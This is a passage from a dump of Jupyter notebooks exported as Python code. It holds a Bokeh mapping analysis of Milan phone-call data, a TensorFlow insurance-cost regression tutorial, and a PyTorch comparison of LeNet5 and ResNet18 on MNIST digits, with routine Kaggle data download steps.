m2p_df.iterrows():\n# new_m2p_df.loc[index].loc['Cell1D']\n\nnew_m2p_df.loc[index].loc['Cell1D']\n\n# +\n# Milan to countries\nm2c_df = []\nfor day in range(start_day, end_day):\n m2c_df.append(pd.read_csv(\"data/sms-call-internet-mi-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0))\n \nm2c_df = pd.concat(m2c_df)\n# -\n\nlen(set(m2c_df['countrycode']))\n\ndf = pd.merge(m2p_df, m2c_df, on=['CellID'])\n\ndf\n\n# +\n\nfrom collections import Counter\n\nfrom bokeh.io import show\nfrom bokeh.models import (\n ColumnDataSource,\n HoverTool,\n LogColorMapper\n)\nfrom bokeh.palettes import Viridis256 as palette\nfrom bokeh.plotting import figure\nfrom bokeh.layouts import column\n\nplots = []\nfor day in range(3,4):\n \n # Load data\n all_data = pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0)\n \n for hour in range(0, 8):\n data = all_data.loc['2013-11-{:02} {:02}:00:00'.format(day, hour)]\n\n calls_per_cell = data['CellID'].values\n calls_per_cell = Counter(calls_per_cell)\n print(day, hour, calls_per_cell.most_common(5))\n calls_per_cell = dict(calls_per_cell)\n \n for key, value in calls_per_cell.items():\n calls_per_cell[key] = value/100\n \n lon = [[coors[0] for coors in cell[\"geometry\"][\"coordinates\"][0]] for cell in grid_json['features']]\n lat = [[coors[1] for coors in cell[\"geometry\"][\"coordinates\"][0]] for cell in grid_json['features']]\n names = [cell[\"id\"] for cell in grid_json['features']]\n calls = [calls_per_cell[cell[\"id\"]+1] if cell[\"id\"]+1 in calls_per_cell else 0 for cell in grid_json['features']]\n calls[0] = 0.0\n calls[-1] = 1.0\n\n # def print_stats(x, y):\n # x = np.asarray(x)\n # y = np.asarray(y)\n # print(y.max(), x.max())\n # print(y.min(), x.min())\n # print((y.min() + y.max()) / 2, (x.min() + x.max()) / 2)\n # print_stats(lon, lat)\n\n color_mapper = LogColorMapper(palette=palette)\n TOOLS = \"pan,wheel_zoom,reset,hover,save\"\n\n source = ColumnDataSource(data=dict(\n lon=lon,\n lat=lat,\n names=names,\n calls=calls,\n center_lon=[np.mean(x) for x in lon],\n center_lat=[np.mean(x) for x in lat],\n ))\n\n p = figure(\n title=\"Italian Provinces by Number of Calls with Milan\", tools=TOOLS,\n x_axis_location=None, y_axis_location=None\n )\n p.grid.grid_line_color = None\n\n p.patches('lon', 'lat', source=source,\n fill_color={'field': 'calls', 'transform': color_mapper},\n fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\n hover = p.select_one(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [\n (\"Name\", \"@names\"),\n (\"Calls)\", \"@calls\"),\n (\"(Lat, Lon)\", \"(@center_lat, @center_lon)\"),\n ]\n plots.append(p)\n# -\n\nshow(column(*plots))\n\nall_data.describe()\n\n# +\ndata = pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0)\n\ncalls_per_province = data['provinceName'].values\ncalls_per_province = Counter(calls_per_province)\n\nprint(calls_per_province.most_common(5))\n\ncalls_per_province = dict(calls_per_province)\n\nfor province in provinces_json['features']:\n province = province[\"properties\"][\"PROVINCIA\"].upper()\n if province not in calls_per_province:\n \n def replace_key(new_key, old_key):\n calls_per_province[new_key] = calls_per_province[old_key]\n del calls_per_province[old_key]\n \n replace_key(\"AOSTA\", \"VALLE D'AOSTA\")\n replace_key(\"BOLZANO\", \"BOLZANO/BOZEN\")\n replace_key(\"MASSA CARRARA\", \"MASSA-CARRARA\")\n \n if province not in calls_per_province:\n raise ValueError('{} is not in province list!'.format(province))\n\nlon = [[coors[0] for coors in province[\"geometry\"][\"coordinates\"][0][0]] for province in provinces_json['features']]\nlat = [[coors[1] for coors in province[\"geometry\"][\"coordinates\"][0][0]] for province in provinces_json['features']]\nnames = [province[\"properties\"][\"PROVINCIA\"] for province in provinces_json['features']]\ncalls = [calls_per_province[province[\"properties\"][\"PROVINCIA\"].upper()] for province in provinces_json['features']]\n\nsource = ColumnDataSource(data=dict(\n lon=lon,\n lat=lat,\n names=names,\n calls=calls,\n center_lon=[np.mean(x) for x in lon],\n center_lat=[np.mean(x) for x in lat],\n))\n\np = figure(\n title=\"Italian Provinces by Number of Calls with Milan\", tools=TOOLS,\n x_axis_location=None, y_axis_location=None\n)\np.grid.grid_line_color = None\n\np.patches('lon', 'lat', source=source,\n fill_color={'field': 'calls', 'transform': color_mapper},\n fill_alpha=0.7, line_color=\"white\", line_width=0.5)\n\nhover = p.select_one(HoverTool)\nhover.point_policy = \"follow_mouse\"\nhover.tooltips = [\n (\"Name\", \"@names\"),\n (\"Calls)\", \"@calls\"),\n (\"(Lat, Lon)\", \"(@center_lat, @center_lon)\"),\n]\n\nshow(p)\n# -\n\n\n\n\n","repo_name":"iancabral/milan_mobile_phone_activity","sub_path":"analysis.ipynb","file_name":"analysis.ipynb","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"38172889659","text":"# + id=\"T6hMh9BjJs4r\"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 408} id=\"GJ01ATBvJ8BP\" outputId=\"400579dc-5d1b-4eb9-a0a3-e5de64017aeb\"\ninsurance = pd.read_csv(\"https://raw.githubusercontent.com/krish1407/Medical-Cost-Personal-Datasets/master/insurance.csv\")\ninsurance\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 428} id=\"OsyPRZVWKCa8\" outputId=\"2e0f0ee9-a9f8-454b-f067-324c7934597a\"\n# One hot encoding\ninsurance_one_hot = pd.get_dummies(insurance)\ninsurance_one_hot\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 428} id=\"rGOjBMZsL_X-\" outputId=\"43825ee2-1b49-4bad-fa93-e53730214003\"\nX = insurance_one_hot.drop(\"charges\",axis=1)\nX\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"2D-jxrgLMWud\" outputId=\"44c786c4-ef11-46a2-bbb8-e69da1947641\"\ny = insurance_one_hot[\"charges\"]\ny\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"-1graMxlMZOc\" outputId=\"c9883dee-5781-46e5-b69c-33597ca0d4c8\"\n# Creating training and test sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42)\nX_train.shape, X_test.shape, y_train.shape, y_test.shape\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HX0Kh-TzNEFT\" outputId=\"c634c8a6-373a-4556-abd0-e6d6f6d6226a\"\n# Create a model for insurance data\n\ntf.random.set_seed(42)\n\ninsurance_model = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.SGD(),\n metrics = [\"mae\"]\n)\n\ninsurance_model.fit(X_train, y_train, epochs = 100)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"clEh7izqVZ3G\" outputId=\"a6748d16-7715-44a0-8c3e-ec126a3a4c5e\"\n# Check the results of the insurance model on the test data\ninsurance_model.evaluate(X_test, y_test)\n\n# + [markdown] id=\"kpNMYmiiWplg\"\n# We can see that our model has performed a bit well in training data(mae = 6880.6774) than the test data(mae = 7023.3291).\n#\n# We got an error of nearly 7000 rupees we will check whether that error is significant.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"i-HGyyCsWl0r\" outputId=\"31632401-7638-4bca-f1a6-2b5c499f68d2\"\ny_train.median(), y_train.mean()\n\n# + [markdown] id=\"l2SclTA1XQkp\"\n# The median is 9575 and the mean is 13346. But our error is 7023. Which is not at all acceptable. Since the error is more than 3/4th of the median nearly half of the mean. So we have to improve our model.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"s8znDh6sXI8S\" outputId=\"6b434c78-6704-4b57-a582-e05362fcb6ba\"\n# Improving the model\ntf.random.set_seed(42)\n\ninsurance_model = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model.fit(X_train, y_train, epochs = 100)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"9qk5PlTuX0pa\" outputId=\"91219192-d7fb-4acb-fc38-f0212a494009\"\ninsurance_model.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"grhI64upX67X\" outputId=\"b39562d5-decc-4469-c98a-19c631747654\"\ntf.random.set_seed(42)\n\ninsurance_model2 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model2.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model2.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"48EpNOYgcam3\" outputId=\"bd76544b-0eef-4ed8-8a26-b86d0365697d\"\ninsurance_model2.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"27AY3fgKYJly\" outputId=\"483ef5d7-5574-402d-d189-cceb3dee510a\"\ntf.random.set_seed(42)\n\ninsurance_model3 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model3.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.001),\n metrics = [\"mae\"]\n)\n\ninsurance_model3.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vN1QVwD1cpLJ\" outputId=\"ac546cd1-d157-4206-fd12-ae7e6c70be15\"\ninsurance_model3.evaluate(X_test, y_test)\n\n# + [markdown] id=\"Mtpbb10LYo97\"\n# So far our best model is Adam(lr=0.01) with epochs = 500\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"FdolKQKsYv83\" outputId=\"7ecba0e4-0407-4ab0-bf59-90ceed1a3c83\"\ntf.random.set_seed(42)\n\ninsurance_model4 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model4.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model4.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"qEWKSUdvcxMo\" outputId=\"96c72d23-867b-43f9-9bd1-81283a61065d\"\ninsurance_model4.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"x0fzApadYzzn\" outputId=\"73c33793-61cd-4eef-aee4-f392ad5bb312\"\ntf.random.set_seed(42)\n\ninsurance_model5 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(7),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model5.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model5.fit(X_train, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vHGlMzcFc_oH\" outputId=\"c27b3c77-08ee-4edf-b044-303eaea3983b\"\ninsurance_model5.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"pIQPGq1-ZCan\" outputId=\"9e8040cd-73e0-493f-ad58-0b5088d873e1\"\ntf.random.set_seed(42)\n\ninsurance_model6 = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(7),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model6.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\nhistory = insurance_model6.fit(X_train, y_train, epochs = 1000)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HMF-JQa_dJIO\" outputId=\"259e516d-f156-4318-e368-a0cc7d7dbf98\"\ninsurance_model6.evaluate(X_test, y_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 296} id=\"NG-x3SSeZRi3\" outputId=\"17a2bbc6-ae23-4077-a614-27845332fb3f\"\n# Plot history (also known as loss curve or a training curve)\npd.DataFrame(history.history).plot()\nplt.ylabel(\"loss\")\nplt.xlabel(\"epochs\")\n\n# + [markdown] id=\"OKvOh-Q1rhE2\"\n# With the above graph we can see how the value of loss varies with respect to epochs.\n#\n# An important question which needs to be answered here is for how long should we train the model. The answer is, it depends on the problem. For this kind of question tensorflow has given a solution.\n#\n# Early stopping callback -----> A tensoflow component which we can add to our model to improve a certain metric. Suppose we are training a model for 100 epochs and after a point say, 70 the loss function hasn't improved significantly for close to say 10 iterations. We stop the training at that point itself.\n\n# + [markdown] id=\"HQCjDC33vAuS\"\n# ### Preprocessing data - Standardisation and Normalisation\n# Neural networks tend to prefer Normalisation. It's enough to normalise only the input columns we dont have to normalise the output columns.\n# Our models converge faster when we apply normalisation. Eg: Suppose we get a loss of 1000 for 200 epochs in data which is not normalised. We will get the same loss of 1000 for 100 epochs itself, if we normalise the data. That is, the model converges faster. \n\n# + id=\"4vLW35-3poOb\"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n# + id=\"wjn3_PTK1NhE\"\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\n\ninsurance = pd.read_csv(\"https://raw.githubusercontent.com/krish1407/Medical-Cost-Personal-Datasets/master/insurance.csv\")\ninsurance\n\n# Create a column transformer\nct = make_column_transformer(\n (MinMaxScaler(), [\"age\",\"bmi\",\"children\"]),\n (OneHotEncoder(handle_unknown=\"ignore\"), [\"sex\",\"smoker\",\"region\"])\n)\n\nX = insurance.drop(\"charges\",axis = 1)\ny = insurance[\"charges\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 42)\n\n# + [markdown] id=\"uj9Rs0XU4cGg\"\n# We fit the column transformer from the training data, and we use that fit to transform the test data. \n#\n# We can't do it the other way because test data is not seen by the model. \n\n# + id=\"MTIeDJzh5VQ3\"\n# Fit the column transformer to the training data\nct.fit(X_train)\n\n# Transform training and test data with normalisation (MinMaxScaler) and OneHotEncoding\nX_train_normal = ct.transform(X_train)\nX_test_normal = ct.transform(X_test)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"k_4U1UTj_Uf9\" outputId=\"4678af77-4aa9-41e2-869b-4a2acdd462d3\"\nX_train.loc[0]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"8P6IhwUo-57w\" outputId=\"4ea1e8db-0017-478e-f51f-3c93e16fbdf1\"\nX_train_normal[0]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"5CDX650Z_IXc\" outputId=\"6ad694b5-4ead-4e77-f7e6-5f9c8b51aaee\"\nX_train.shape, X_train_normal.shape\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"IYDPQ-Hy_sXQ\" outputId=\"ded422cd-1423-446d-ae11-4287eeb7b214\"\n# Construct the model with normalised data\n# So far our best model is insurance_model2 Adam(lr=0.01) with epochs = 500\n\ntf.random.set_seed(42)\n\ninsurance_model2_normalise = tf.keras.Sequential([\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model2_normalise.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model2_normalise.fit(X_train_normal, y_train, epochs = 500)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"jhL3lK_QBIYK\" outputId=\"ae47129d-8fda-4fac-eccb-e4183d734133\"\n\ntf.random.set_seed(42)\n\ninsurance_model3_normalise = tf.keras.Sequential([\n tf.keras.layers.Dense(100),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Dense(1)\n])\n\ninsurance_model3_normalise.compile(\n loss = tf.keras.losses.mae,\n optimizer = tf.keras.optimizers.Adam(lr=0.01),\n metrics = [\"mae\"]\n)\n\ninsurance_model3_normalise.fit(X_train_normal, y_train, epochs = 500)\n","repo_name":"Prithivee7/Deep-Learning","sub_path":"Build_Tensors/DL_2_neural_network_regression_2.ipynb","file_name":"DL_2_neural_network_regression_2.ipynb","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"8574222546","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"qQtmoVU_56kp\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, f1_score, accuracy_score\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.models import resnet18\nimport torch.nn as nn\nimport torch.optim as optim\n\n# + [markdown] id=\"5YA-ZWBF3xr1\"\n# #Charging data using kaggle API\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 69} id=\"6EHt2kla-xCi\" outputId=\"85dec63d-607f-4d0d-c693-bec90f98d5ff\"\nfrom google.colab import files\nfiles.upload()\n# !pip install -q kaggle\n# !mkdir -p ~/.kaggle\n# !cp kaggle.json ~/.kaggle/\n# !chmod 600 ~/.kaggle/kaggle.json\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"-WRv9bzT-9Pk\" outputId=\"2dfe1b13-20bf-452b-afc8-ffd2861890b2\"\n# !kaggle competitions download -c digit-recognizer\n# !unzip digit-recognizer.zip\n\n# + id=\"1hqAbyGl34J7\"\ndata = pd.read_csv(\"train.csv\")\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n# + [markdown] id=\"XsH-w7JV4DWS\"\n# # Displaying the images before transformation\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 277} id=\"ljYu6JWX4DGh\" outputId=\"858382d4-9913-4526-d8d4-bc6b1bf17ea8\"\n\nfig, axes = plt.subplots(1, 5, figsize=(12, 6))\n\nfor i in range(5):\n index = random.randint(0, len(data))\n img_data = data.iloc[index, 1:].values.reshape(28, 28)\n ax = axes[i]\n ax.imshow(img_data, cmap='gray')\n ax.set_title(f\"Label: {data.iloc[index, 0]}\")\n\nplt.tight_layout()\nfig.subplots_adjust(top=2) \nfig.suptitle(\"Original Images\")\naxes[0].set_ylabel(\"Original\")\nplt.show()\n\n\n# + [markdown] id=\"kLPPa4Nx5ULr\"\n# # Displaying the images after transformation\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 277} id=\"l5LZLmtr-rhq\" outputId=\"90c9c58d-ba2a-4906-ce43-e01a849fe9d9\"\ntransform = transforms.Compose([\n transforms.ToTensor(), # Convert the input image to a PyTorch Tensor\n transforms.Lambda(lambda x: x.repeat(3, 1, 1)), # Create a 3-channel image for the ResNet18 model\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)) # Normalize the image \n])\n\nfig, axes = plt.subplots(1, 5, figsize=(12, 6))\n\nfor i in range(5):\n index = random.randint(0, len(data))\n img_data = data.iloc[index, 1:].values.reshape(28, 28)\n\n img_data = data.iloc[index, 1:].values.astype(np.float32).reshape(28, 28)\n transformed_img_data = transform(img_data).numpy().transpose(1, 2, 0)[:,:,0]\n ax = axes[i]\n ax.imshow(transformed_img_data, cmap='gray')\n ax.set_title(f\"Label: {data.iloc[index, 0]}\")\n\nplt.tight_layout()\nfig.subplots_adjust(top=2) \nfig.suptitle(\"Transformed Images\")\naxes[0].set_ylabel(\"Transformed\")\nplt.show()\n\n\n# + [markdown] id=\"lpUHaNRc6_Bb\"\n# #Defining MNIST Dataset Class.\n\n# + id=\"P7F-hpnknZh8\"\nclass MNISTDataset(Dataset):\n def __init__(self, data, transform=None, mode=\"train\"):\n self.data = data\n self.transform = transform\n self.mode = mode\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n if self.mode == \"train\": # If in train mode, get both image and label\n image = self.data.iloc[index, 1:].values.astype(np.float32).reshape(28, 28)\n label = self.data.iloc[index, 0]\n else: # If not in train mode, get only the image and set the label to -1\n image = self.data.iloc[index].values.astype(np.float32).reshape(28, 28)\n label = -1\n\n if self.transform:\n image = self.transform(image)\n\n return image, label\n\n\n# + [markdown] id=\"w7ajslqQ7hAP\"\n# #Creating Training and Validation Data Loaders\n\n# + id=\"9Octc40U7dYP\"\ntrain_data, val_data = train_test_split(data, test_size=0.2, random_state=0)\n\ntrain_dataset = MNISTDataset(train_data, transform)\nval_dataset = MNISTDataset(val_data, transform)\n\n# Shuffle the train loader to provide random batches during training, while keeping the validation loader in its original order\ntrain_loader = DataLoader(train_dataset, batch_size=100, shuffle=True)\nval_loader = DataLoader(val_dataset, batch_size=100, shuffle=False)\n\n\n# + [markdown] id=\"l9IVG5iI6fmr\"\n# # Implementing LeNet5\n# This implementation is based on the code found in the following GitHub repository: https://github.com/gradient-ai/LeNet5-Tutorial\n#\n\n# + id=\"StR9JDcc6Xnb\"\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.fc1 = nn.Linear(16 * 4 * 4, 120)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(120, 84)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(84, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n out = self.relu2(out)\n out = self.fc3(out)\n return out\n\n\n\n# + [markdown] id=\"77XubSke6kXc\"\n# #Creating functions to train and compare the models\n\n# + id=\"BpulaRlWoJba\"\ndef train_model(model, dataloader, criterion, optimizer, device):\n model.train()\n running_loss = 0.0\n running_corrects = 0\n\n for inputs, labels in dataloader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(inputs) # Pass the inputs through the model to get the output predictions\n _, preds = torch.max(outputs, 1) # Get the class with the highest predicted probability\n loss = criterion(outputs, labels) # Calculate the loss between the predicted output and the true labels\n\n loss.backward() # Perform backpropagation to calculate gradients\n optimizer.step() # Update the model parameters using the calculated gradients\n\n running_loss += loss.item() * inputs.size(0) # Accumulate the total loss\n running_corrects += torch.sum(preds == labels.data) # Accumulate the total number of correct predictions\n\n epoch_loss = running_loss / len(dataloader.dataset)\n epoch_acc = running_corrects.double() / len(dataloader.dataset)\n\n return epoch_loss, epoch_acc\n\n\n# + id=\"w6tqF3a8oKwy\"\ndef evaluate_model(model, dataloader, criterion, device):\n model.eval() # Set the model to evaluation mode, which turns off dropout and batch normalization layers\n\n # Initialize variables to keep track of the running loss and the number of correct predictions\n running_loss = 0.0\n running_corrects = 0\n\n with torch.no_grad(): # Turn off gradient calculations\n # Iterate over the dataset using the provided dataloader\n for inputs, labels in dataloader:\n # Move the input and target tensors to the specified device (CPU or GPU)\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs) # Compute the model's output for the given inputs\n\n _, preds = torch.max(outputs, 1) # Find the predicted class \n\n # Compute the loss between the model's prediction and the target labels\n loss = criterion(outputs, labels)\n\n # Accumulate the loss and the number of correct predictions for the batch\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n # Compute the average loss and accuracy for the entire dataset\n epoch_loss = running_loss / len(dataloader.dataset)\n epoch_acc = running_corrects.double() / len(dataloader.dataset)\n\n return epoch_loss, epoch_acc\n\n\n\n# + [markdown] id=\"e88Cda5q6qXz\"\n# # Training and comparing the models\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"gQAFQ5bqoN7G\" outputId=\"601df255-4e5c-4b7f-c38f-3c5a648154d6\"\ndef training(model, train_loader, val_loader, epochs, criterion, optimizer, device):\n best_val_acc = 0.0\n best_model_wts = model.state_dict()\n\n train_loss_history = []\n val_loss_history = []\n train_acc_history = []\n val_acc_history = []\n\n for epoch in range(epochs):\n # Train the model for one epoch and obtain the training loss and accuracy\n train_loss, train_acc = train_model(model, train_loader, criterion, optimizer, device)\n # Evaluate the model on the validation set and obtain the validation loss and accuracy\n val_loss, val_acc = evaluate_model(model, val_loader, criterion, device)\n\n # Update the best model weights if the current validation accuracy is higher than the previous best\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_model_wts = model.state_dict()\n\n # Append the current epoch's losses and accuracies to the history lists\n train_loss_history.append(train_loss)\n val_loss_history.append(val_loss)\n train_acc_history.append(train_acc.cpu().numpy())\n val_acc_history.append(val_acc.cpu().numpy())\n\n\n model.load_state_dict(best_model_wts)\n return model, train_loss_history, val_loss_history, train_acc_history, val_acc_history\n\nnum_epochs = 10\n\n\nmodels = {\n \"LeNet5\": LeNet5(num_classes=10),\n \"resnet18\": resnet18(num_classes=10)\n}\n\nresults = {}\n\nfor name, model in models.items():\n print(f\"Training {name}\")\n\n # Move the model to the specified device\n model = model.to(device)\n # Set the loss function and optimizer for the model\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n # Train the model using the training function defined earlier\n model, train_loss_hist, val_loss_hist, train_acc_hist, val_acc_hist = training(\n model, train_loader, val_loader, num_epochs, criterion, optimizer, device\n )\n\n # Store the trained model and the history of losses and accuracies in the results dictionary\n results[name] = {\n \"model\": model,\n \"train_loss\": train_loss_hist,\n \"val_loss\": val_loss_hist,\n \"train_acc\": train_acc_hist,\n \"val_acc\": val_acc_hist\n }\n\n print(f\"{name} training completed.\")\n\n\n# + [markdown] id=\"vta7izwk4gK-\"\n# # Plot confusion matrix and F1 score\n#\n#\n\n# + id=\"CN28ml284Niw\"\ndef plot_confusion_matrix(cm, target_names, title='Confusion matrix', cmap=None, normalize=True):\n import itertools\n # Calculate accuracy and misclassification rate\n accuracy = np.trace(cm) / np.sum(cm).astype('float')\n misclass = 1 - accuracy\n\n if cmap is None:\n cmap = plt.get_cmap('Blues')\n\n plt.figure(figsize=(8, 6))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n if normalize: # Normalize the confusion matrix\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\n # Add the individual cell values as text on the plot\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\n plt.show()\n\n\n\ndef compute_metrics(model, dataloader, device):\n model.eval()\n y_true = []\n y_pred = []\n\n with torch.no_grad(): # Turn off gradient calculations\n for inputs, labels in dataloader: # Move the input and target tensors to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n y_true.extend(labels.cpu().numpy())\n y_pred.extend(preds.cpu().numpy())\n\n # Compute the confusion matrix and the F1-score\n cm = confusion_matrix(y_true, y_pred)\n f1 = f1_score(y_true, y_pred, average='weighted')\n\n return cm, f1\n\n\n\n# + id=\"nvILodcs4Y9S\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"ecca0ff5-56f8-455f-9f1f-712a80e55ec3\"\nfor name, result in results.items():\n model = result[\"model\"]\n cm, f1 = compute_metrics(model, val_loader, device)\n\n print(f\"{name} Confusion Matrix:\")\n plot_confusion_matrix(cm, list(range(10)), title=f\"{name} Confusion Matrix\")\n\n print(f\"{name} F1 Score: {f1:.4f}\")\n\n# + [markdown] id=\"bVBrY02UqTuC\"\n# # Plot the training loss and accuracy\n#\n\n# + id=\"lnAGGxVmoVVy\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 807} outputId=\"d269002c-9d19-4f7c-8084-626c5b7c8bb9\"\nfig, axes = plt.subplots(2, 2, figsize=(12, 8))\n\nfor name, result in results.items():\n axes[0, 0].plot(result[\"train_loss\"], 